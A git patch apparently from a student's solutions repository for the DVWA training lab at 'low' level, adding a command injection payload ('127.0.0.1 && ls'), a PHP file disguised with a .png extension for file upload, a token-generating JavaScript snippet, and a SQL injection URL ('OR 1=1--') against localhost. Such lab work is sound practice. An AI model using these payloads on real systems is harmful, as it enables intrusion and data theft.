From de2700067e856161d81ecc0db98d6d44cd773247 Mon Sep 17 00:00:00 2001 From: Louis Date: Fri, 8 Dec 2023 10:02:50 +0100 Subject: [PATCH] feat: :construction: Starting low level --- .DS_Store | Bin 0 -> 8196 bytes Command Injection/low.bash | 1 + File injection/file-inject-low.png | 4 ++++ Javascript/low.js | 3 +++ SQL Injection/low.txt | 1 + 5 files changed, 9 insertions(+) create mode 100644 .DS_Store create mode 100644 Command Injection/low.bash create mode 100644 File injection/file-inject-low.png create mode 100644 Javascript/low.js create mode 100644 SQL Injection/low.txt diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..c74961200f830aa90b0cf2998992d882fcbc96f6 GIT binary patch literal 8196 zcmeHM&2G~`5T0!VbyNxw0x3sJT#HCbsDvsZHv|qyTrh$IpkUV_ak0HoY}Z0jB;SzW z#G`QI1$YHsf>+?c><@_{&ff)5F(d7M>)rX{na_?l;{X6_r(P4F4gdx=fwf)iN=&Sa zHfLLU<|-mXK7a{6L~sf{IGOXN2~vO*AO%PPQh*fr7ZkufTbQw6-&d>DlLDl`f2n|Y zKA6}9S{ieO^3j2vECCQJI4upwSO-XssnODyE0k3HOjSKFO=Y^oV2Y0Grf^5JH0BBw z9hjm6(`RP7LSgdk$TOuoFiRozqyQ-}uYjoCFT+Eu+XJlHi}ibga~vW!i-&H&UG)3n z4g)_<8jWvkYrAsc;*POn>>97^0nhBjNz%COj9!SNr<@1wud(Ak^LtshcI`fo6335v zBT4YR9=g1I?nfTa+B}WCSaNN(U{sB2w^kpITdl^vd8c_e**C{`4{+SNeK?s^jq5jV z9X;v34Z?_jP-!v!Xn?&x()_q8$DrS|Pk1;i@Rn*4@=ix&zZS0gw6^i_l^ZV)-T}g%MuM1m3|-7~rT6gOZGwco*~iG5CC-^IgiAWxF1u zB-cwN@dtQMW+l-t^ex8z$eG5z#D5m~I{qbbUnz+@#4F*U_9=uV(XU_>b2xf4&0!^L zmdX08l6=IyWa)b0GSj!kqG97|)a5NFWnMSzrnI#S@T GD)1BihWiu% literal 0 HcmV?d00001 diff --git a/Command Injection/low.bash b/Command Injection/low.bash new file mode 100644 index 0000000..38967e7 --- /dev/null +++ b/Command Injection/low.bash @@ -0,0 +1 @@ +127.0.0.1 && ls \ No newline at end of file diff --git a/File injection/file-inject-low.png b/File injection/file-inject-low.png new file mode 100644 index 0000000..0874e35 --- /dev/null +++ b/File injection/file-inject-low.png @@ -0,0 +1,4 @@ +$output"; +?> \ No newline at end of file diff --git a/Javascript/low.js b/Javascript/low.js new file mode 100644 index 0000000..7e8bdff --- /dev/null +++ b/Javascript/low.js @@ -0,0 +1,3 @@ +const phrase = document.getElementById("phrase").value; +const token = md5(rot13(phrase)); +console.log(token); \ No newline at end of file diff --git a/SQL Injection/low.txt b/SQL Injection/low.txt new file mode 100644 index 0000000..03116cf --- /dev/null +++ b/SQL Injection/low.txt @@ -0,0 +1 @@ +Full url : http://localhost:4280/vulnerabilities/sqli/?id=test%27+OR+1=1--%27&Submit=Submit# \ No newline at end of file